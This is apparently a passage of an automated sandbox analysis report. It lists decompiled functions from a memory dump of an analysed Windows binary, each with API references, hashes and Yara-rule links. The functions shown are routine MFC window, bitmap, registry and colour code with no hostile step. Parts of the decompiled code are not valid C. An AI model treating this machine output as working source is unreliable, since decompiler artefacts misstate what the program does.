					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E0041F330(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x435374;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x4465c8 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x4465c8 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E0041E5DF(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 00404AD5
_memset.LIBCMT ref: 00404B37
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00404B89
LoadBitmapA.USER32 ref: 00404BA1

Strings

tSC, xrefs: 00404B51
, xrefs: 00404AF6

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID: $tSC
API String ID: 4271682439-84426305
Opcode ID: 1fb548bed39b3eef695a2972ddbee2fea5d738d9e9ebe4badec35ea53fb165ee
Instruction ID: f93c5f26688163433edc60361cc36291d0a2f72699a6ff0e350c35afdfd69af5
Opcode Fuzzy Hash: 1fb548bed39b3eef695a2972ddbee2fea5d738d9e9ebe4badec35ea53fb165ee
Instruction Fuzzy Hash: 153109B2A002099FEB10CFB8DC85ABE7BB5EB84304F15043BE602EB2D1D674D945C754

Uniqueness

Uniqueness Score: -1.00%

Function 00418F07, Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00418F07(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E00409C97(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E0040CA70(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E00418F07(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E00409C97(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E00418EB2(_t45, E00409C97(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E00409C97(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E00409C97(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}

APIs

GetWindow.USER32(?,00000002), ref: 00418F22
GetParent.USER32(?), ref: 00418F33
GetWindow.USER32(?,00000002), ref: 00418F56
GetWindow.USER32(?,00000002), ref: 00418F68
GetWindowLongA.USER32 ref: 00418F77
IsWindowVisible.USER32(?), ref: 00418F91
GetTopWindow.USER32(?), ref: 00418FB7

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 46e72c5683fd03fb34599a0f95d5ff76554a5fa3dadfd6045a368a77cb432448
Instruction ID: 5631cdc5cc6889daffde78f578d4d612bd2c5089616566f59ea8a3a8e6a984d0
Opcode Fuzzy Hash: 46e72c5683fd03fb34599a0f95d5ff76554a5fa3dadfd6045a368a77cb432448
Instruction Fuzzy Hash: EE21F832A047146BD6206B758C09FEB779DBF84754F050A2EF985A7291DB2CEC41C698

Uniqueness

Uniqueness Score: -1.00%

Function 00406653, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406653(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x0040666e
0x00406675
0x00406678
0x0040667b
0x0040667e
0x00406689
0x004066c0
0x004066c0
0x004066cb
0x004066d0
0x004066d0
0x004066d5
0x004066da
0x004066da
0x004066e3

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00406681
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004066A4
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004066C0
RegCloseKey.ADVAPI32(?), ref: 004066D0
RegCloseKey.ADVAPI32(?), ref: 004066DA

Strings

software, xrefs: 00406669

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 82500bd82a10186b28fc24c1a7056618e6e1782bf6ab030e2217d6fa9fd66f96
Instruction ID: bc813771eb951e0115408790e1de8cf4d033a672c96248005cb1173a93d838a7
Opcode Fuzzy Hash: 82500bd82a10186b28fc24c1a7056618e6e1782bf6ab030e2217d6fa9fd66f96
Instruction Fuzzy Hash: 4F11F876E01158FBCB21DF9ADD84CEFBFBCEF85750B1040AAA601A2121D2719A14DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040F402, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040F402(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E0041F7F4(0, 0);
				_t22 = E0040EAD1(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E004037AF(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E0041F330(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E0041F7C2(_t28);
			}

APIs

LeaveCriticalSection.KERNEL32(?), ref: 0040F409
__CxxThrowException@8.LIBCMT ref: 0040F413

Part of subcall function 0041F7F4: RaiseException.KERNEL32(?,?,?,?), ref: 0041F834

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004), ref: 0040F42A
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F437

Part of subcall function 004037AF: __CxxThrowException@8.LIBCMT ref: 004037C3

_memset.LIBCMT ref: 0040F456
TlsSetValue.KERNEL32(?,00000000), ref: 0040F467
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F488

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 9a583ed615a21241be3b18dce36bb94a94ae7a546afbdb5bd567d3504d28efd3
Instruction ID: fd93560edbf6851b4f3960d9b72a4f37630a2f2519325dc6941088bc0f039299
Opcode Fuzzy Hash: 9a583ed615a21241be3b18dce36bb94a94ae7a546afbdb5bd567d3504d28efd3
Instruction Fuzzy Hash: DC11C274100605AFCB20AF50DC89C6BBBA9FF54308760C13EF816A25A1CB34AE95CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF21, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EF21(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x0040ef2b
0x0040ef31
0x0040ef38
0x0040ef3f
0x0040ef46
0x0040ef53
0x0040ef5a
0x0040ef5d
0x0040ef60
0x0040ef64

APIs

GetSysColor.USER32(0000000F), ref: 0040EF2D
GetSysColor.USER32(00000010), ref: 0040EF34
GetSysColor.USER32(00000014), ref: 0040EF3B
GetSysColor.USER32(00000012), ref: 0040EF42
GetSysColor.USER32(00000006), ref: 0040EF49
GetSysColorBrush.USER32(0000000F), ref: 0040EF56
GetSysColorBrush.USER32(00000006), ref: 0040EF5D

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 6b616b1b9c3c417a51a19aefae0052fa6c7b88ea5b2225527b113589cbbc0862
Instruction ID: f59acb6467372613553c355d87f79defc1ce8ae1078b4449624b824b30ee7355
Opcode Fuzzy Hash: 6b616b1b9c3c417a51a19aefae0052fa6c7b88ea5b2225527b113589cbbc0862
Instruction Fuzzy Hash: F0F0F871A407489BD730BB729D09B47BAE1EFC4B10F02192ED2818BA90E6B6E0409F44

Uniqueness

Uniqueness Score: -1.00%

Function 00433C38, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00433C38() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x44680c =  *0x44680c & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x44680c = _t6;
					return _t6;
				}
			}

0x00433c49
0x00433c53
0x00433c57
0x00433c73
0x00433c73
0x00000000
0x00433c73
0x00433c59
0x00433c5f
0x00000000
0x00000000
0x00000000
0x00433c61
0x00433c61
0x00433c66
0x00433c6c
0x00000000
0x00433c6c

APIs

GetVersion.KERNEL32 ref: 00433C40
GetVersion.KERNEL32 ref: 00433C4B
GetVersion.KERNEL32 ref: 00433C53
GetVersion.KERNEL32 ref: 00433C59
RegisterClipboardFormatA.USER32 ref: 00433C66

Strings

MSWHEEL_ROLLMSG, xrefs: 00433C61

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 6e13466c39be63d6abcca6283d65c4debe34d0bda91c07c1490ada4aa240426f
Instruction ID: 4356ce2cf077731b6ec7b5d007e1485f223b33f16df30197ff0064379991df0c
Opcode Fuzzy Hash: 6e13466c39be63d6abcca6283d65c4debe34d0bda91c07c1490ada4aa240426f
Instruction Fuzzy Hash: 30E04F7B8015135EE7112F69BC043A627945BAE392F56B03B9D01A22509A3C19438EBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405957, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405957(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E00405880();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E00403ED6();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

APIs

GetWindowLongA.USER32 ref: 00405989
GetParent.USER32(00401257), ref: 00405997
GetParent.USER32(00401257), ref: 004059AA
GetLastActivePopup.USER32(00401257), ref: 004059B9
IsWindowEnabled.USER32(00401257), ref: 004059CE
EnableWindow.USER32(00401257,00000000), ref: 004059E1

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 3b1ec5fce5c6df1d94cf4d325c1fcdaf986b697a71e109a9ef266bcaa307bb9b
Instruction ID: 0fd042f9c84c3817d672c4b8ef0a745a4829e1649fc024bfe0b5622049980979
Opcode Fuzzy Hash: 3b1ec5fce5c6df1d94cf4d325c1fcdaf986b697a71e109a9ef266bcaa307bb9b
Instruction Fuzzy Hash: 52118CB2605B21DBD6222A699844B6BB69CDF64B70F150136EC00F3395DB78DC019EED

Uniqueness

Uniqueness Score: -1.00%

Function 0040F839, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040F839(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

APIs

ClientToScreen.USER32(?,?), ref: 0040F848
GetDlgCtrlID.USER32 ref: 0040F85C
GetWindowLongA.USER32 ref: 0040F86A
GetWindowRect.USER32 ref: 0040F87C
PtInRect.USER32(?,?,?), ref: 0040F88C
GetWindow.USER32(?,00000005), ref: 0040F899

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: b6dff1484203bce84157c908e257711b99aee86806842bf46e6917bca70776a7
Instruction ID: f664ab31a6303e9d539a40d152b99c50a5e09be0de03728c9acbdc8a8ff8b10d
Opcode Fuzzy Hash: b6dff1484203bce84157c908e257711b99aee86806842bf46e6917bca70776a7
Instruction Fuzzy Hash: E2016236600515ABDB216F94DC08EEF376CEF84751F048136FD11B75A0D738EA158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00410A89, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00410A89(intOrPtr __ebx, void** __ecx, void* __edx, intOrPtr __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				intOrPtr _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x443590; // 0x8ffedb05
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E004108CC(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E004108F7(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E0041E982(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E00410A0C(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E00410A0C(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E0041E5DF(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

APIs

GlobalLock.KERNEL32 ref: 00410AB3
lstrlenA.KERNEL32(?), ref: 00410AFB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00410B15

Strings

System, xrefs: 00410AAF

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 60c34cc932e0d0d5f620731a07cb8a59de673b6203500529a3185df5c7ea08ab
Instruction ID: 77f56c5e0b70ae88688f1258a2549f44d8c60beea92c973b3041d18e2da12858
Opcode Fuzzy Hash: 60c34cc932e0d0d5f620731a07cb8a59de673b6203500529a3185df5c7ea08ab
Instruction Fuzzy Hash: 8641B171904219DFCB14DFE4C885AEEBBB5FF44318F14812AE412EB285E7B8A9C5CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004120C5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004120C5(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_push(0x20);
				E0041F753(E00432B84, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43688c;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E00419E18(_t59, _t59 + 0x24, _t75);
						E0040ED13(_t59 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E0040EEC3(_t59, 0x4393e0) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E0041A1FB(_t59 + 0x40);
						 *(_t77 - 4) = 0;
						E00419FED(_t59, _t59 + 0x24, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						E00404913(_t59);
						return E0041F7D6(_t59, _t75, _t76);
					}
					_t75 = _t59 + 0x40;
					do {
						_t76 = E0041A142(_t59, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							E00411888(_t76);
							_push(_t76);
							E00402F0C(_t59, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E00406B97(_t77 - 0x24)));
